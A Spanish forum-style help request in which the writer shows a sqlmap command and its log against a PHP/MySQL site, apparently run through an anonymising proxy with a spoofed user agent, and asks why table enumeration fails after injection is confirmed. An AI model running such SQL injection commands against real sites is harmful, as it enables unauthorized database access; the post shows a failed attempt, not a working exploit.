Con sqlmap haciendo pruebas consigo ver que BD es y confirmar que se puede inyectar tráfico, pero para intentar ver las tablas, el usuario de la BD o cualquier cosa es imposible, solo se puede ver que BD es y confirmar que es inyectable...Puede ser que realmente no sea inyectable ? Pongo el ejemplo:
./sqlmap.py --url="http://www.prueba.com/index.php?id=13&it=90" --user-agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid)Firefox/3.0.15" --proxy="http://127.0.0.1:8118" -D mysql --tables
sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
- starting at: 13:08:45 [13:08:45]
[13:08:45] [INFO] resuming injection point 'GET' from session file
[13:08:45] [INFO] resuming injection parameter 'it' from session file
[13:08:45] [INFO] resuming injection type 'numeric' from session file
[13:08:45] [INFO] resuming match ratio '0.844' from session file
[13:08:45] [INFO] resuming 0 number of parenthesis from session file
[13:08:45] [INFO] resuming back-end DBMS 'mysql 5' from session file
[13:08:45] [INFO] testing connection to the target url
[13:08:49] [INFO] testing for parenthesis on injectable parameter
[13:08:49] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2000
web application technology: PHP 5.2.6, Microsoft IIS 5.0
back-end DBMS: MySQL 5
[13:08:49] [INFO] fetching tables for database 'mysql'
[13:08:49] [INFO] fetching number of tables for database 'mysql'
[13:08:49] [INFO] read from file '/pentest/database/sqlmap/output/www.prueba.com/session':
[13:08:49] [INFO] read from file '/pentest/database/sqlmap/output/www.prueba.com/session':
[13:08:49] [INFO] retrieved:
[13:08:55] [WARNING] unable to retrieve the number of tables for database 'mysql'
[13:08:55] [CRITICAL] unable to retrieve the tables for any database
- shutting down at: 13:08:55